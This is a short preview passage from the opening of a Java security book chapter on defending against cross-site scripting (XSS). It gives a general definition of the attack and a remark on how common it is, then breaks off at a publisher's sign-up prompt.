CHAPTER4
Cross-Site Scripting Defense
Cross-site scripting, or “XSS,” is a form of attack executed by including untrusted data, such as malicious JavaScript code, into the victim’s web browser. Simply put, XSS is attacker-driven code running within client browsers or other JavaScript engines. XSS attacks are perpetrated by inserting malicious JavaScript or JavaScript fragments into a host website where it’s later executed in victims’ web browsers when the host site is viewed.
XSS is one of the most common vulnerabilities found across the Web. In our personal experience, 80–90 percent of websites subjected to intensive penetration testing exhibited ...
Get Iron-Clad Java now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.